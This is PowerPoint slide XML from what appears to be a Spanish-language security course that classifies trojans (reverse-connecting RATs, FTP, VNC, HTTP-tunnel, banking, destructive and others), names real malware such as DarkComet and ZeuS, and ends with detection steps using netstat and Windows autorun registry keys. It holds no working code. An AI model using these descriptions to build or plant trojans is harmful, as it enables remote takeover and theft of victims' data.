      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Tiene como objetivo utilizar a las maquinas "secundarias" para atacar al objetivo principal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: Illusion BOT, netbot attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1022863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Troyanos Proxy Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los atacantes usan los equipos de las victimas para conectarse a internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: W3bPrOxy Tr0j4nCr34t0r</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25739210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3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Instalan un servidor FTP en el equipo de la victima, el cual abre los puertos FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: TinyFTPD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="1 Título"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Troyanos FTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37054841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Troyanos VNC </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Inicia un Servidor VNC deamon en el sistema. Se puede conectar utilizando cualquier visor VNC. Se tiene acceso remoto total, escritorio, pantalla, mouse, teclado, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: WinVNC, aunque no sea un troyano en sí, sirve para "controlar" a los empleados, "que están haciendo"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19676091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Troyanos HTTP/HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Sirven para saltar los firewalls creando una conexión por los puertos 80 y 443, de esa manera se crea un "túnel". Se ejecutan en el host interno.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Ejemplo: HTTP RAT: Muestra datos, keystrokes, archivos, deshabilita programas, floodea las conexines a internet, distribuye threads, hace seguimiento de las actividades de navegación, jihackea el navegador, hace fraude, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Shttpd Trojan: Es un pequeño servidor http que puede ser incrustado en cualquier programa, por ej (chess.exe) cuando este se ejecute el servidor web se ejecuta en segundo plano.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="705616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Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Programa malicioso que se encuentra dentro de un programa aparentemente inofensivo que puede obtener acceso y causar daño.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Con la ayuda de un troyano un atacante puede obtener acceso a las contraseñas almacenadas en el equipo, también puede leer documentos personales, borrar archivos y mostrar imágenes y/o mostrar mensajes en la pantalla</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26132918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Troyanos ICMP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Esto se estudia precisamente para conocer que se puede crear troyanos de todo tipo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: icmpsend (old)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31574808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Troyanos de acceso remoto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Trabaja como un acceso al escritorio. El hacker consigue un acceso GUI completo al sistema remoto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Ejemplo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Se infecta el equipo con "server.exe" y planta un Reverse Connecting Trojan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2.- El troyano conecta el puerto 80 al atacante y establece una conexión reversa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3.- El atacante tiene el control total sobre el equipo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Ejemplo: Beast, RAT DarkComet, Apocalypse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17025351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Troyanos CCTT (Covert Channel Tunneling Trojan)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>1. Presenta varias técnicas de explotación, creando canales de transferencia de datos arbitrarias para enviar streams autorizados por un sistema de control de acceso a la red.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>2. Habilita a los atacantes de obtener shell externa del servidor desde una red interna y viceversa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>3. Utiliza TCP/UDP/HTTP CONNECT|POST channel permitiendo TCP data streams (SSH, SMTP, POP, etc) entre el servidor externo y el interno.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13854525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Troyanos E-banking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Intercepta información de la cuenta de la víctima antes de que se cifre y la envía al comando del troyano del atacante y el centro de control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: ZeuS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23506300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Troyanos destructivos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Peligrosos. Cuando se ejecutan destruyen el S.O. El usuario no podrá iniciar el S.O. Formatea todos las unidades locales y de red.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15861512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Troyanos de notificación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Envía la locación del IP de la víctima, cuando la víctima se conecta, el atacante recibe la notificación.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27321908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Troyanos de tarjetas de crédito</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Tienen un propósito, el de robar la información de la tarjeta de crédito de las víctimas. Engaña a los usuarios con sitios web de bancos falsos para que estos ingresen su información. Los servidores transmiten los datos robados a hackers remotos utilizando mail, FTP, IRC, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9775402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Troyanos Data Hiding (Troyanos encriptados)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Son difíciles de detectar, puesto que están encriptados o cifran información en el sistema, cifran comunicaciones.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16942338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Troyano de Blakberry: PhoneSnoop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Activa remotamente el micrófono de los blackberry escuchando sonidos alrededor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="712855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pt-BR" dirty="0"/>
              <a:t>Troyano MAC OS X: DNSChanger</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Le dice al usuario que se descargó un códec que al instalarlo hace un DNS Poison. Incluso luego ejecuta un video para que no haya sospecha. Posteriormente el atacante es notificado mediante un HTTP Post message que el equipo fue infectado. Los hackers toman control total del equipo de la víctima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Otro Troyano para MAC es el Hell Raiser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4130816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Su propósito</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>El propósito de los troyanos son variados, por ejemplo, robar información como contraseñas, códigos de seguridad utilizando keyloggers. Borrar o remplazar archivos críticos del S.O. Generar tráfico para crear ataques DoS. Descargar spyware, adwares y archivos maliciosos. Deshabilitar firewalls y antivirus. Capturar pantallas, audio y video. Infectar el equipo como un proxy server. Utilizar el equipo para hacer spamm o blasting mensajes de correo. Utilizar el equipo como botnet para realizar ataques DoS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18044052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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Escaneando puertos sospechosos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat -an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	netstat -anb </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Además muestra los binarios que están utilizando los puertos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Otras Herramientas: IceSword, CurrPorts, TCPView (GUI)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26561687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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>2. Escaneando Procesos sospechosos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Por ejemplo vemos que iexplore.exe está en ejecución pero no está abierto... sospechoso</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Otro ejemplo, spytector keylogger (o algo así) utiliza al navegador y mailer por defecto para enviar sus logs. El firewall nunca se dará cuenta porque las aplicaciones son legítimas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Herramientas: What's Running, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14172766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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>3. Escaneando entradas al registro sospechosas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Windows ejecuta automáticamente instrucciones en las siguientes secciones del registro:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>HKEY_CURRENT_USER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Que contienen: Run, RunServices, RunServicesOnce, HKEY_CLASSES_ROOT\exefile\shell\open\command "%" %*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
